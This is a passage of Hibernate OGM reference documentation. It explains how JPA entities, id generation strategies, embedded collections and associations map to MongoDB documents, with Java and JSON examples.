: \"guitarPlayer\",\n \"nextGuitarPlayerId\" : 2\n}\n----\n====\n\n*3) SEQUENCE generation strategy*\n\n[[mongodb-sequence-id-generation-strategy]]\n.SEQUENCE id generation strategy using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE)\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\nSong collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(2),\n \"title\" : \"Flower Duet\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"song_sequence_name\", \"next_val\" : 21 }\n----\n====\n\n[[mongodb-sequence-id-generation-strategy-custom]]\n.SEQUENCE id generation strategy using custom values\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"songSequenceGenerator\")\n @SequenceGenerator(\n name = \"songSequenceGenerator\",\n sequenceName = \"song_seq\",\n initialValue = 2,\n allocationSize = 20\n )\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\nSong collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(2),\n \"title\" : \"Flower Duet\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"song_seq\", \"next_val\" : 42 }\n----\n====\n\n[[mongodb-auto-id-generation-strategy]]\n*4) AUTO generation strategy*\n\n[WARNING]\n====\nCare must be taken when using the `GenerationType.AUTO` strategy.\nWhen the property `hibernate.id.new_generator_mappings` is set to `false` (default),\nit will map to the `IDENTITY` strategy.\nAs described before, this requires your ids to be of type `ObjectId` or `@Type(type = \"objectid\") String`.\nIf `hibernate.id.new_generator_mappings` is set to true, `AUTO` will be mapped to the `TABLE` strategy.\nThis requires your id to be of a numeric type.\n\nWe recommend to not use `AUTO` but one of the explicit strategies (`IDENTITY` or `TABLE`) to avoid\npotential misconfigurations.\n\nFor more details you can check the issue https:\/\/hibernate.atlassian.net\/browse\/OGM-663[OGM-663].\n====\n\nIf the property `hibernate.id.new_generator_mappings` is set to `false`,\n`AUTO` will behave as the `IDENTITY` strategy.\n\nIf the property `hibernate.id.new_generator_mappings` is set to `true`,\n`AUTO` will behave as the `SEQUENCE` strategy.\n\n.AUTO id generation strategy using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class DistributedRevisionControl {\n\n @Id\n @GeneratedValue(strategy = GenerationType.AUTO)\n private Long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\nDistributedRevisionControl collection\n\n[source, JSON]\n----\n{ \"_id\" : NumberLong(1), \"name\" : \"Git\" }\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"hibernate_sequence\", \"next_val\" : 2 }\n----\n====\n\n.AUTO id generation strategy wih `hibernate.id.new_generator_mappings` set to false and ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class Comedian {\n\n @Id\n @GeneratedValue(strategy = GenerationType.AUTO)\n private ObjectId id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\nComedian collection\n\n[source, JSON]\n----\n{ \"_id\" : ObjectId(\"5458b11693f4add0f90519c5\"), \"name\" : \"Louis C.K.\" }\n----\n====\n\n.Entity with @EmbeddedId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic 
\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n\nRendered as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"title\": \"How does Hibernate OGM MongoDB work?\",\n \"author\": \"Guillaume\"\n }\n}\n----\n====\n\n===== Embedded objects and collections\n\nHibernate OGM stores elements annotated with `@Embedded` or `@ElementCollection` as nested documents of the owning entity.\n\n.Embedded object\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n @Embedded\n private NewsPaper paper;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class NewsPaper {\n\n private String name;\n private String owner;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"title\": \"On the merits of NoSQL\",\n \"paper\": {\n \"name\": \"NoSQL journal of prophecies\",\n \"owner\": \"Delphy\"\n }\n}\n----\n====\n\n.@ElementCollection with primitive types\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountWithPhone {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<String> mobileNumbers;\n\n \/\/ getters, setters ...\n}\n----\n\nAccountWithPhone collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john_account\",\n \"mobileNumbers\" : [ \"+1-222-555-0222\", \"+1-202-555-0333\" ]\n}\n----\n====\n\n.@ElementCollection with one attribute\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"df153180-c6b3-4a4c-a7da-d5de47cf6f00\",\n \"grandChildren\" : [ \"Luke\", \"Leia\" ]\n}\n----\n====\n\nThe class `GrandChild` has only one attribute, `name`;\nthis means that Hibernate OGM doesn't need to store the name of the attribute.\n\nIf the nested document has two or more fields, like in the following example,\nHibernate OGM will store the names of the fields as well.\n\n.@ElementCollection with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n @OrderColumn( name = \"birth_order\" )\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"e3e1ed4e-c685-4c3f-9a67-a5aeec6ff3ba\",\n \"grandChildren\" :\n [\n {\n \"name\" : \"Luke\",\n \"birth_order\" : 0\n },\n {\n \"name\" : \"Leia\",\n \"birth_order\" : 1\n }\n ]\n}\n----\n====\n\n.@ElementCollection with Map of @Embeddable\n====\n[source, JAVA]\n----\n@Entity\npublic class ForumUser {\n\n\t@Id\n\tprivate String name;\n\n\t@ElementCollection\n\tprivate Map<String, JiraIssue> issues = new HashMap<>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class JiraIssue {\n\n\tprivate Integer number;\n\tprivate String project;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"Jane Doe\",\n \"issues\" : {\n \"issueWithNull\" : {\n },\n \"issue2\" : {\n \"number\" : 2000,\n \"project\" : \"OGM\"\n },\n \"issue1\" : {\n \"number\" : 1253,\n \"project\" : \"HSEARCH\"\n }\n }\n}\n----\n====\n\n[NOTE]\n====\nYou can override the column name used for a property of an embedded object.
\nBut you need to know that the default column name is the concatenation of the embedding property,\na `.` (dot) and the embedded property (recursively for several levels of embedded objects).\n\nThe MongoDB datastore treats dots specially as it transforms them into nested documents.\nIf you want to override one column name and still keep the nested structure, don't forget the dots.\n\nThat's a bit abstract, so let's use an example.\n\n[source, JAVA]\n----\n@Entity\nclass Order {\n @Id String number;\n User user;\n Address shipping;\n @AttributeOverrides({\n @AttributeOverride(name=\"name\", column=@Column(name=\"delivery.provider\")),\n @AttributeOverride(name=\"expectedDelaysInDays\", column=@Column(name=\"delivery.delays\"))\n })\n DeliveryProvider deliveryProvider;\n CreditCardType cardType;\n}\n\n\/\/ default columns\n@Embedded\nclass User {\n String firstname;\n String lastname;\n}\n\n\/\/ override one column\n@Embeddable\npublic class Address {\n String street;\n @Column(name=\"shipping.dest_city\")\n String city;\n}\n\n\/\/ both columns overridden from the embedding side\n@Embeddable\npublic class DeliveryProvider {\n String name;\n Integer expectedDelaysInDays;\n}\n\n\/\/ do not use dots in the overriding\n\/\/ and mix levels (bad form)\n@Embedded\nclass CreditCardType {\n String merchant;\n @Column(name=\"network\")\n String network;\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\": \"123RF33\",\n \"user\": {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\"\n },\n \"shipping\": {\n \"street\": \"1 av des Champs Elys\u00e9es\",\n \"dest_city\": \"Paris\"\n },\n \"delivery\": {\n \"provider\": \"Santa Claus Inc.\",\n \"delays\": \"1\"\n },\n \"network\": \"VISA\",\n \"cardType\": {\n \"merchant\": \"Amazon\"\n }\n}\n----\n\nIf you share the same embeddable in different places, you can use JPA's `@AttributeOverride`\nto override columns from the embedding side.\nThis is the case of `DeliveryProvider` in our example.\n\nIf you omit the dot in one of the columns, this column will not be part of the nested document.\nThis is demonstrated by the `CreditCardType`.\nWe advise you against it.\nLike crossing streams, it is bad form.\nThis approach might not be supported in the future.\n====\n\n[[mongodb-associations]]\n==== Associations\n\nHibernate OGM MongoDB proposes three strategies to store navigation information for associations.\nThe three possible strategies are:\n\n* <<mongodb-in-entity-strategy, IN_ENTITY>> (default)\n* <<mongodb-association-document-strategy, ASSOCIATION_DOCUMENT>>, using a global collection for all associations\n* <<mongodb-collection-per-association-strategy, COLLECTION_PER_ASSOCIATION>>, using a dedicated collection for each association\n\nTo switch between these strategies, use one of the three approaches to options:\n\n* annotate your entity with `@AssociationStorage` and `@AssociationDocumentStorage` annotations (see <<ogm-mongodb-annotation-configuration>>),\n* use the API for programmatic configuration (see <<ogm-mongodb-programmatic-configuration>>)\n* or specify a default strategy via the `hibernate.ogm.datastore.document.association_storage` and\n`hibernate.ogm.mongodb.association_document_storage` configuration properties.\n\n[[mongodb-in-entity-strategy]]\n===== In Entity strategy\n\n* <<mongodb-in-entity-to-one-associations, *-to-one associations>>\n* <<mongodb-in-entity-to-many-associations, *-to-many associations>>\n\nIn this strategy, Hibernate OGM stores the id(s) of the associated entity(ies)\ninto the entity document itself.
\nThis field stores the id value for to-one associations and an array of id values for to-many associations.\nAn embedded id will be represented by a nested document.\nFor indexed collections (i.e. `List` or `Map`), the index will be stored along with the id.\n\n[NOTE]\n====\nWhen using this strategy the `@JoinTable` annotation will be ignored because no collection is created\nfor associations.\n\nYou can use `@JoinColumn` to change the name of the field that stores the foreign key (as an example, see\n<<mongodb-in-entity-one-to-one-join-column>>).\n====\n\n[[mongodb-in-entity-to-one-associations]]\n===== To-one associations\n\n.Unidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\nVehicle collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"W001\",\n \"diameter\" : 0,\n \"vehicle_id\" : \"V_01\"\n}\n----\n====\n\n[[mongodb-in-entity-one-to-one-join-column]]\n.Unidirectional one-to-one with @JoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @JoinColumn( name = \"part_of\" )\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\nVehicle collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"W001\",\n \"diameter\" : 0,\n \"part_of\" : \"V_01\"\n}\n----\n====\n\nIn a true one-to-one association, it is possible to share the same id between the two entities\nand therefore a foreign key is not required. You can see how to map this type of association in\nthe following example:
\n\n.Unidirectional one-to-one with @MapsId and @PrimaryKeyJoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @PrimaryKeyJoinColumn\n @MapsId\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\nVehicle collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"diameter\" : 0\n}\n----\n====\n\n.Bidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Husband {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Wife wife;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wife {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Husband husband;\n\n \/\/ getters, setters ...\n}\n----\n\nHusband collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"alex\",\n \"name\" : \"Alex\",\n \"wife\" : \"bea\"\n}\n----\n\nWife collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"bea\",\n \"name\" : \"Bea\",\n \"husband\" : \"alex\"\n}\n----\n====\n\n.Bidirectional one-to-one (Mapping to the same Entity)\n====\n[source, JAVA]\n----\n@Entity\npublic class Person {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Person spouse;\n\n \/\/ getters, setters ...\n}\n----\n\nPerson (husband) collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"alex\",\n \"name\" : \"Alex\",\n \"spouse\" : \"bea\"\n}\n----\n\nPerson (wife) collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"bea\",\n \"name\" : \"Bea\",\n \"spouse\" : \"alex\"\n}\n----\n====\n\n.Unidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class JavaUserGroup {\n\n @Id\n private String jugId;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Member {\n\n @Id\n private String id;\n private String name;\n\n @ManyToOne\n private JavaUserGroup memberOf;\n\n \/\/ getters, setters ...\n}\n----\n\nJavaUserGroup collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"summer_camp\",\n \"name\" : \"JUG Summer Camp\"\n}\n----\n\nMember collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"jerome\",\n \"name\" : \"Jerome\",\n \"memberOf_jugId\" : \"summer_camp\"\n}\n{\n \"_id\" : \"emmanuel\",\n \"name\" : \"Emmanuel Bernard\",\n \"memberOf_jugId\" : \"summer_camp\"\n}\n----\n====\n\n.Bidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class SalesForce {\n\n @Id\n private String id;\n private String corporation;\n\n @OneToMany(mappedBy = \"salesForce\")\n private Set<SalesGuy> salesGuys = new HashSet<SalesGuy>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class SalesGuy {\n\n @Id\n private String id;\n private String name;\n\n @ManyToOne\n private SalesForce salesForce;\n\n \/\/ getters, setters ...\n}\n----\n\nSalesForce collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"red_hat\",\n \"corporation\" : \"Red Hat\",\n \"salesGuys\" : [ \"eric\", \"simon\" ]\n}\n----\n\nSalesGuy collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"eric\",\n \"name\" : \"Eric\",\n \"salesForce_id\" : \"red_hat\"\n}\n{\n \"_id\" : \"simon\",\n \"name\" : \"Simon\",\n \"salesForce_id\" : \"red_hat\"\n}
\"salesForce_id\" : \"red_hat\"\n}\n----\n====\n\n.Bidirectional many-to-one between entities with embedded ids\n====\n[source, JAVA]\n----\n@Entity\npublic class Game {\n\n @EmbeddedId\n private GameId id;\n\n private String name;\n\n @ManyToOne\n private Court playedOn;\n\n \/\/ getters, setters ...\n}\n\n\npublic class GameId implements Serializable {\n\n private String category;\n\n @Column(name = \"id.gameSequenceNo\")\n private int sequenceNo;\n\n \/\/ getters, setters ...\n \/\/ equals \/ hashCode\n}\n\n@Entity\npublic class Court {\n\n @EmbeddedId\n private CourtId id;\n\n private String name;\n\n @OneToMany(mappedBy = \"playedOn\")\n private Set<Game> games = new HashSet<Game>();\n\n \/\/ getters, setters ...\n}\n\npublic class CourtId implements Serializable {\n\n private String countryCode;\n private int sequenceNo;\n\n \/\/ getters, setters ...\n \/\/ equals \/ hashCode\n}\n----\n\n.Court collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n },\n \"name\" : \"Hamburg Court\",\n \"games\" : [\n { \"gameSequenceNo\" : 457, \"category\" : \"primary\" },\n { \"gameSequenceNo\" : 456, \"category\" : \"primary\" }\n ]\n}\n----\n\n.Game collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"category\" : \"primary\",\n \"gameSequenceNo\" : 456\n },\n \"name\" : \"The game\",\n \"playedOn_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n }\n}\n{\n \"_id\" : {\n \"category\" : \"primary\",\n \"gameSequenceNo\" : 457\n },\n \"name\" : \"The other game\",\n \"playedOn_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n }\n}\n----\n====\n\nHere we see that the embedded id is represented as a nested document\nand directly referenced by the associations.\n\n[[mongodb-in-entity-to-many-associations]]\n===== To-many associations\n\n.Unidirectional one-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\",\n \"products\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n\nProduct collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n====\n\n.Unidirectional one-to-many with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\",\n \"products\" : [\n {\n \"products_name\" : \"Pretzel\",\n \"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n====\n\nA map can be used to represent an association,\nin this case Hibernate 
\n\n.Unidirectional one-to-many using maps with defaults\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\nUser collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"user_001\",\n \"addresses\" : [\n {\n \"work\" : \"address_001\",\n \"home\" : \"address_002\"\n }\n ]\n}\n----\n\nAddress collection as JSON in MongoDB\n\n[source, JSON]\n----\n{ \"_id\" : \"address_001\", \"city\" : \"Rome\" }\n{ \"_id\" : \"address_002\", \"city\" : \"Paris\" }\n----\n====\n\nIf the map value cannot be represented by a single field (e.g. when referencing a type with a composite id\nor using an embeddable type as map value type),\na sub-document containing all the required fields will be stored as value.\n\nIf the map key either is not of type `String` or it is made up of several columns (composite map key),\nthe optimized structure shown in the example above cannot be used as MongoDB only allows for Strings as field names.\nIn that case the association will be represented by a list of sub-documents, also containing the map key column(s).\nYou can use `@MapKeyColumn` to rename the field containing the key of the map,\notherwise it will default to \"<%COLLECTION_ROLE%>_KEY\", e.g. \"addresses_KEY\".\n\n.Unidirectional one-to-many using maps with @MapKeyColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n @MapKeyColumn(name = \"addressType\")\n private Map<Long, Address> addresses = new HashMap<Long, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\nUser collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"user_001\",\n \"addresses\" : [\n {\n \"addressType\" : 1,\n \"addresses_id\" : \"address_001\"\n },\n {\n \"addressType\" : 2,\n \"addresses_id\" : \"address_002\"\n }\n ]\n}\n----\n\nAddress collection as JSON in MongoDB\n\n[source, JSON]\n----\n{ \"_id\" : \"address_001\", \"city\" : \"Rome\" }\n{ \"_id\" : \"address_002\", \"city\" : \"Paris\" }\n----\n====\n\nIn case you want to enforce the list-style representation also for maps with a single key column of type `String`\n(e.g. when reading back data persisted by earlier versions of Hibernate OGM),\nyou can do so by setting the option `hibernate.ogm.datastore.document.map_storage` to the value `AS_LIST`.
\n\n.Unidirectional many-to-many using in entity strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" : \"John Doe\"\n}\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\",\n \"students\" : [\n \"mario\",\n \"john\"\n ]\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\",\n \"students\" : [\n \"mario\",\n \"kate\"\n ]\n}\n----\n====\n\n.Bidirectional many-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany( mappedBy = \"bankAccounts\" )\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\",\n \"bankAccounts\" : [ \"account_1\" ]\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\",\n \"owners\" : [ \"owner_1\", \"owner2222\" ]\n}\n----\n====\n\n.Ordered list with embedded id\n====\n[source, JAVA]\n----\n@Entity\npublic class Race {\n @EmbeddedId\n private RaceId raceId;\n\n @OrderColumn(name = \"ranking\")\n @OneToMany @JoinTable(name = \"Race_Runners\")\n private List<Runner> runnersByArrival = new ArrayList<Runner>();\n\n \/\/ getters, setters ...\n}\n\npublic class RaceId implements Serializable {\n private int federationSequence;\n private int federationDepartment;\n\n \/\/ getters, setters, equals, hashCode\n}\n\n@Entity\npublic class Runner {\n @EmbeddedId\n private RunnerId runnerId;\n private int age;\n\n \/\/ getters, setters ...\n}\n\npublic class RunnerId implements Serializable {\n private String firstname;\n private String lastname;\n\n \/\/ getters, setters, equals, hashCode\n}\n----\n\n.Race collection\n[source, JSON]\n----\n{\n \"_id\": {\n \"federationDepartment\": 75,\n \"federationSequence\": 23\n },\n \"runnersByArrival\": [{\n \"firstname\": \"Pere\",\n \"lastname\": \"Noel\",\n \"ranking\": 1\n }, {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\",\n \"ranking\": 0\n }]\n}\n----\n\n.Runner collection\n[source, JSON]\n----\n{\n \"_id\": {\n \"firstname\": \"Pere\",\n \"lastname\": \"Noel\"\n },\n \"age\": 105\n}\n{\n \"_id\": {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\"\n },\n \"age\": 37\n}\n----\n====\n\n[[mongodb-collection-per-association-strategy]]\n===== One collection per association strategy\n\nIn this strategy, Hibernate OGM creates a MongoDB collection per association\nin which it will store all navigation information for that particular association.\n\nThis is the strategy closest to the relational model.\nIf an 
entity A is related to B and C, two collections will be created.\nThe name of such a collection is the name of the association table prefixed with \`associations_\`.\n\nFor example, if the \`BankAccount\` and \`Owner\` are related,\nthe collection used to store the association will be named \`associations_Owner_BankAccount\`.\nThe prefix is useful to quickly distinguish the association collections from the entity collections.\nYou can also decide to rename the collection representing the association using \`@JoinTable\`\n(see <<mongodb-one-collection-strategy-join-table, an example>>).\n\nEach document of an association collection has the following structure:\n\n* \`_id\` contains the id of the owner of the relationship\n* \`rows\` contains all the ids of the related entities\n\n[NOTE]\n====\nThe preferred approach is to use the <<mongodb-in-entity-strategy, in-entity strategy>>\nbut this approach can alleviate the problem of having documents that are too big.\n====\n\n.Unidirectional relationship\n====\n[source, JSON]\n----\n{\n \"_id\" : { \"owners_id\" : \"owner0001\" },\n \"rows\" : [\n \"accountABC\",\n \"accountXYZ\"\n ]\n}\n----\n====\n\n.Bidirectional relationship\n====\n[source, JSON]\n----\n{\n \"_id\" : { \"owners_id\" : \"owner0001\" },\n \"rows\" : [ \"accountABC\", \"accountXYZ\" ]\n}\n{\n \"_id\" : { \"bankAccounts_id\" : \"accountXYZ\" },\n \"rows\" : [ \"owner0001\" ]\n}\n----\n====\n\n[NOTE]\n====\nThis strategy won't affect *-to-one associations or embedded collections.\n====\n\n.Unidirectional one-to-many using one collection per strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nassociations_Basket_Product collection\n[source, JSON]\n----\n{\n \"_id\" : { \"Basket_id\" : \"davide_basket\" },\n \"rows\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n====\n\nThe order of the elements in the list can be preserved using \`@OrderColumn\`.\nHibernate OGM will store the order by adding an additional field to the document\ncontaining the association.\n\n.Unidirectional one-to-many using one collection per strategy with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n @OrderColumn\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nassociations_Basket_Product collection\n\n[source, JSON]\n----\n{\n \"_id\" : { \"Basket_id\" : \"davide_basket\" },\n \"rows\" : [\n {\n \"products_name\" : \"Pretzel\",\n 
\"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n====\n\n.Unidirectional many-to-many using one collection per association strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" : \"John Doe\"\n}\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : 